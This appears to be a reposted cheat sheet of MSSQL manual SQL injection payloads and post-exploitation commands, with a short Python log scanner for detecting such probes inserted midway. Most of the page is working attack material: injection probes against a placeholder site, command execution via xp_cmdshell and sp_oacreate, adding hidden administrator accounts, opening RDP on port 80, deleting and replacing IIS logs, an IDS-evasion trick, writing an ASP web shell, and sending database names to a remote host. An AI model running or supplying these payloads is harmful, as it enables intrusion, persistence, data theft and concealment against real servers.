(Reposted collection) MSSQL manual injection statement set

Source: Internet
Author: User
Tags: server, website

and exists(select * from sysobjects) // checks whether the backend is MSSQL

and exists(select * from tableName) // checks whether a table exists; tableName is the table name

and 1=(select @@version) // MSSQL version

and 1=(select db_name()) // current database name

and 1=(select @@servername) // local server name

and 1=(select is_srvrolemember('sysadmin')) // checks whether the current login is a sysadmin

and 1=(select is_member('db_owner')) // checks whether the current user has db_owner permission

and 1=(select has_dbaccess('master')) // checks whether the current user can read the master database

and 1=(select name from master.dbo.sysdatabases where dbid=1) // enumerates database names; dbid is 1, 2, 3 ...

; declare @d int // checks whether stacked (multi-statement) queries are supported

and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell') // checks whether xp_cmdshell exists

and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread') // checks whether the xp_regread extended stored procedure has been deleted

Add a login test with SA permission (SA permission is required):

exec master.dbo.sp_addlogin test, password

exec master.dbo.sp_addsrvrolemember test, sysadmin

Stop or start a service (SA permission required):

exec master..xp_servicecontrol 'stop', 'schedule'

exec master..xp_servicecontrol 'start', 'schedule'

Dump the website directory (read from the registry):

create table labeng (lala nvarchar(255), id int)

declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'System\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into labeng (lala) values (@result);

and 1=(select top 1 lala from labeng)   // or: and 1=(select count(*) from labeng where lala>1)

-----------------------------------------------------

 

Enable 3389 (Terminal Services) from the command line and change the port number:

sc config termservice start= auto

net start termservice

// Allow external connections

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f

// Change port 3389 to port 80

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f

SQL Server

 

Determine whether injection is possible:

http://www.targer.com/article.asp?id=6

http://www.targer.com/article.asp?id=6'

http://www.targer.com/article.asp?id=6 and 1=1

http://www.targer.com/article.asp?id=6 and 1=2

http://www.targer.com/article.asp?action=value' and 1=1

http://www.targer.com/article.asp?action=value' and 1=2

Searchpoints%' and 1=1

Searchpoints%' and 1=2

Determine the database type:

http://www.targer.com/article.asp?id=6 and user>0

http://www.targer.com/article.asp?id=6 and (select count(*) from sysobjects)>0

 

Query the current user's data:

article.asp?id=6 having 1=1--

Columns in the current table:

article.asp?id=6 group by admin.username having 1=1--

article.asp?id=6 group by admin.username, admin.password having 1=1--

Arbitrary tables and columns:

and (select top 1 name from (select top N id, name from sysobjects where xtype=char(85)) T order by id desc)>1

and (select top 1 col_name(object_id('admin'), N) from sysobjects)>1

Dump database data:

and (select top 1 password from admin where id=N)>1

Modify data in the database:

; update admin set password='oooooooo' where username='xxx'

Add data to the database:

; insert into admin values (xxx, oooooooo)--

Delete a database:

; drop database webdata

Get the current database user name: and user>0

Get the current database name: and db_name()>0

Get the database version: and (select @@version)>0

Determine whether stacked (multi-statement) queries are supported: ; declare @a int--

Determine whether subqueries are supported: and (select count(1) from [sysobjects])>=0

 

Extended stored procedure: exec master..xp_cmdshell

View the directory of server drive C: ; exec master..xp_cmdshell 'dir c:\'

Determine whether the extended stored procedure exists: and (select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')>0

Restore the extended stored procedure: ; exec sp_addextendedproc xp_cmdshell, 'xplog70.dll'

Delete the extended stored procedure: ; exec sp_dropextendedproc 'xp_cmdshell'

MSSQL 2000 provides stored procedures that give indirect access to OLE objects:

; declare @s int

; exec sp_oacreate 'wscript.shell', @s out

; exec master..sp_oamethod @s, 'run', null, 'cmd.exe /c dir c:\'

 

Determine whether the current database user has elevated server roles:

and 1=(select is_srvrolemember('sysadmin'))

and 1=(select is_srvrolemember('serveradmin'))

and 1=(select is_srvrolemember('setupadmin'))

and 1=(select is_srvrolemember('securityadmin'))

and 1=(select is_srvrolemember('diskadmin'))

and 1=(select is_srvrolemember('bulkadmin'))

Determine whether the current database user is db_owner:

and 1=(select is_member('db_owner'))

All database information in SQL Server is stored in the master.dbo.sysdatabases table; PUBLIC permission is enough to SELECT from it:

and (select top 1 name from master.dbo.sysdatabases order by dbid)>0

and (select top 1 name from master.dbo.sysdatabases where name not in (select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0

 

Delete log records:

; exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070606.log > c:\temp.txt'

Replace log records:

exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5\ex070404.log c:\winnt\system32\logfiles\w3svc5\ex070606.log > c:\temp.txt'

Obtain the web path:

; declare @shell int

; exec master..sp_oacreate 'wscript.shell', @shell out

; exec master..sp_oamethod @shell, 'run', null, 'cmd.exe /c dir /s d:\index.asp > c:\log.txt'

Search with xp_cmdshell:

; exec master..xp_cmdshell 'dir /s d:\index.asp'

Commands for displaying the server's website configuration:

cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/1/root

cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root

Use xp_regread to read registry data with PUBLIC permission:

; exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'System\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', '/'

 

For more on advanced SQL Server techniques, see chapter 5 of Proficient Script Hacker by Zeng Yunhao.

 

3. DSqlHelper

 

Check the SYSADMIN permission:

and 1=(select is_srvrolemember('sysadmin'))

The same check applies to serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, and (with is_member) db_owner.

Check XP_CMDSHELL (CMD command execution):

and 1=(select count(*) from master.dbo.sysobjects where name='xp_cmdshell')

Check XP_REGREAD (registry read function):

and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')

Check SP_MAKEWEBTASK (backup function):

and 1=(select count(*) from master.dbo.sysobjects where name='sp_makewebtask')

Check SP_ADDEXTENDEDPROC:

and 1=(select count(*) from master.dbo.sysobjects where name='sp_addextendedproc')

Check XP_SUBDIRS (reads subdirectories):

and 1=(select count(*) from master.dbo.sysobjects where name='xp_subdirs')

Check XP_DIRTREE (reads the directory tree):

and 1=(select count(*) from master.dbo.sysobjects where name='xp_dirtree')

Modify content:

; update tableName set field=content where 1=1

 

xp_cmdshell detection:

; exec master..xp_cmdshell 'dir c:\'

Restore XP_CMDSHELL:

; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

Use XP_CMDSHELL to add a user hacker:

; exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'

Use xp_cmdshell to add the user hacker to the administrators group:

; exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'

Create table test:

; create table [dbo].[test] ([dstr] [char](255));

Test:

and exists(select * from test)

Read the web location (from the registry):

; declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'System\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into test (dstr) values (@result);--

Reveal the absolute web path (error-based):

and 1=(select count(*) from test where dstr>1)

Delete table test:

; drop table test;--

 

Create a table dirs to hold the directory listing:

; create table dirs (paths varchar(100), id int)

Insert the directory listing into the dirs table:

; insert dirs exec master.dbo.xp_dirtree 'C:\'

Dump the directory contents from dirs:

and 0<>(select top 1 paths from dirs)

Back up the current database:

declare @a sysname; set @a=db_name(); backup database @a to disk='C:\inetpub\wwwroot\down.bak';--

Delete table dirs:

; drop table dirs;--

Create table temp:

; create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--

Insert the list of drives into the temp table:

; insert temp exec master.dbo.xp_availablemedia;--

Clear table temp:

; delete from temp;--

Create table dirs:

; create table dirs (paths varchar(100), id int);--

Obtain the subdirectory list with XP_SUBDIRS:

; insert dirs exec master.dbo.xp_subdirs 'C:\';--

Dump the contents (error-based):

and 0<>(select top 1 paths from dirs)

Clear table dirs:

; delete from dirs;--

Create table dirs:

; create table dirs (paths varchar(100), id int)--

Use XP_CMDSHELL to list the directory contents:

; insert dirs exec master..xp_cmdshell 'dir c:\'

Clear table dirs:

; delete from dirs;--

 

Check SP_OAcreate (command execution):

and 1=(select count(*) from master.dbo.sysobjects where name='sp_oacreate')

SP_OAcreate:

; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net user hacker 123456 /add'

SP_OAcreate, create a directory:

; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c md E:\XkCmsV\webForm\1111'

Create a virtual directory e for drive E:

; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "e", "e:\"'

Make virtual directory e browsable:

; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

Start the Server service:

; exec master..xp_servicecontrol 'start', 'server'

Bypassing IDS detection of xp_cmdshell (split string):

; declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'

Query a remote database, form 1:

; select * from openrowset('sqloledb', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1')

Query a remote database, form 2:

; select * from openrowset('sqloledb', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table')

// Check the permissions

and 1=(select is_member('db_owner'))

and char(124)%2Bcast(is_member('db_owner') as varchar(1))%2Bchar(124)=1;--

// Check whether the current user has read permission on a database

and 1=(select has_dbaccess('master'))

and char(124)%2Bcast(has_dbaccess('master') as varchar(1))%2Bchar(124)=1--
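A defender-side check that is not part of the original page: this added Python example URL-decodes the query field of IIS-style request logs and flags the MSSQL-specific probe families listed above (role checks, sysobjects/sysdatabases lookups, xp_cmdshell including the split-string form, OLE automation, registry and directory procedures, OPENROWSET, the char(124) conversion-error trick, and stacked queries). The log lines are constructed and the signature names are my own.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the MSSQL-specific probes listed on this page, grouped by
# what the request is trying to learn or reach (matched on the decoded query).
PROBES = {
    "role_probe": r"is_srvrolemember\s*\(|is_member\s*\(|has_dbaccess\s*\(",
    "catalog_probe": r"\bsysobjects\b|\bsysdatabases\b",
    "xp_cmdshell": r"\bxp_cmdshell\b|'xp_'\s*\+\s*'cmdshell'",  # includes the split-string evasion
    "ole_automation": r"\bsp_oacreate\b|\bsp_oamethod\b",
    "registry": r"\bxp_regread\b|\bxp_regwrite\b",
    "filesystem": r"\bxp_dirtree\b|\bxp_subdirs\b|\bxp_availablemedia\b",
    "linked_query": r"\bopenrowset\b|\bopendatasource\b",
    "pipe_error_trick": r"char\s*\(\s*124\s*\)",  # char(124)+cast(...)+char(124) conversion-error trick
    "stacked_query": r";\s*(declare|exec|drop|update|insert|create)\b",
}
COMPILED = {name: re.compile(rx) for name, rx in PROBES.items()}


def classify_query(raw_query: str) -> list:
    """Return the probe families found in one URL-encoded cs-uri-query value."""
    decoded = unquote_plus(raw_query).lower()  # %2B -> '+', %20 -> ' '
    return [name for name, rx in COMPILED.items() if rx.search(decoded)]


def scan_log(lines) -> list:
    """Scan IIS W3C lines (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status)
    and return one (client_ip, uri_stem, [probe families]) tuple per suspicious request."""
    alerts = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue  # skip blank lines and W3C header directives
        parts = line.split()
        if len(parts) < 7:
            continue
        tags = classify_query(parts[5])
        if tags:
            alerts.append((parts[2], parts[4], tags))
    return alerts


# Constructed sample log: three probes taken from this page plus one benign request.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-06-06 10:01:22 203.0.113.5 GET /article.asp id=6%20and%201=(select%20is_srvrolemember('sysadmin')) 200
2007-06-06 10:01:23 203.0.113.5 GET /article.asp id=6%20and%20char(124)%2Bcast(is_member('db_owner')%20as%20varchar(1))%2Bchar(124)=1 500
2007-06-06 10:01:24 198.51.100.7 GET /article.asp id=6 200
2007-06-06 10:01:25 203.0.113.5 GET /display.asp keyno=188;declare%20@a%20sysname%20set%20@a='xp_'%2B'cmdshell'%20exec%20@a%20'dir%20c:' 500
"""

if __name__ == "__main__":
    for ip, stem, tags in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {stem} -> {', '.join(tags)}")
```

Requests that hit several families from one client in a short window (here 203.0.113.5) are the ones worth escalating; a single catalog_probe on its own is a weaker signal.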

 

Numeric type:

and char(124)%2Buser%2Bchar(124)=0

Character type:

' and char(124)%2Buser%2Bchar(124)=0 and ''='

Search type:

' and char(124)%2Buser%2Bchar(124)=0 and '%'='

Dump the user name:

and user>0

' and user>0 and ''='

Check whether the permission is SA:

and 1=(select is_srvrolemember('sysadmin'));--

and char(124)%2Bcast(is_srvrolemember(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1--

Check whether the database is MSSQL:

and exists(select * from sysobjects);--

Check whether stacked queries are supported:

; declare @d int;--

Restore xp_cmdshell:

; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';--

 

select * from openrowset('sqloledb', 'server=192.168.1.200,1433;uid=test;pwd=pafsp', 'select @@version')

//-----------------------

// Execute commands

//-----------------------

First, enable sandbox mode:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Jet\4.0\Engines', 'sandboxmode', 'reg_dword', 1

Then run the system command through Jet OLEDB:

select * from openrowset('Microsoft.Jet.OLEDB.4.0', ';database=c:\winnt\system32\ias.mdb', 'select shell("cmd.exe /c net user admin admin1234 /add")')

Execute a command:

; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

exec [master].[dbo].[xp_cmdshell] 'COMMAND /c md c:\8080'

Determine whether the xp_cmdshell extended stored procedure exists:

http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')

Write to the registry:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Jet\4.0\Engines', 'sandboxmode', 'reg_dword', 1

REG_SZ

Read the registry:

exec master..xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows NT\CurrentVersion\Winlogon', 'userinit'

Read directory contents:

exec master..xp_dirtree 'C:\winnt\system32\', 1, 1

 

Database backup:

backup database pubs to disk='C:\123.bak'

// Dump the row count (length)

and (select char(124)%2Bcast(count(1) as varchar(8000))%2Bchar(124) from D99_Tmp)=0;--

To change the sa password, run the following command:

exec sp_password NULL, 'newpassword', 'sa'

Test:

exec master.dbo.sp_addlogin test, ptlove

exec master.dbo.sp_addsrvrolemember test, sysadmin

Delete the xp_cmdshell extended stored procedure:

exec sp_dropextendedproc 'xp_cmdshell'

Add an extended stored procedure:

exec [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'

grant exec on xp_proxiedadata to public

 

Stop or start a service:

exec master..xp_servicecontrol 'stop', 'schedule'

exec master..xp_servicecontrol 'start', 'schedule'

dbo.xp_subdirs

Lists only the subdirectories of a directory.

xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

Compresses multiple target files into one cabinet file. All files to be compressed are appended to the end of the parameter list, separated by commas.

dbo.xp_makecab 'C:\test.cab', 'mszip', 1, 'C:\Inetpub\wwwroot\SQLInject\login.asp', 'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

Stops a running program; the process ID is passed as the parameter. In Task Manager, choose "View" > "Select Columns" to display the process ID of each running program.

xp_terminate_process 2484

xp_unpackcab

Decompresses a cabinet file.

xp_unpackcab 'C:\test.cab', 'c:\temp', 1

 

On a computer with Radmin installed, the password had been changed, regedit.exe had been deleted or renamed, and net.exe did not exist, so there was no way to import a registry file with regedit /e; however, MSSQL was running with SA permission. Executing exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'System\RAdmin\v2.0\Server\Parameters', 'Parameter', 'REG_BINARY', 0x02ba5e187e2589be6f80da0046aa7e3c changes the password to 12345678. To modify the port value, execute exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'System\RAdmin\v2.0\Server\Parameters', 'Port', 'REG_BINARY', 0xd20400, which changes the port to 1234.

create database lcx;

create table ku (name nvarchar(256) null);

create table biao (id int null, name nvarchar(256) null);

// Obtain the database names

insert into opendatasource('sqloledb', 'server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

// Create a table in master to check the permissions

create table master..D_TEST (id nvarchar(4000) null, Data nvarchar(4000) null);--

Use sp_makewebtask to write a one-line script directly into the web directory:

http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

// Update table content

update films set kind='dramatic' where id=123

// Delete content

delete from table_name where Stockid=3
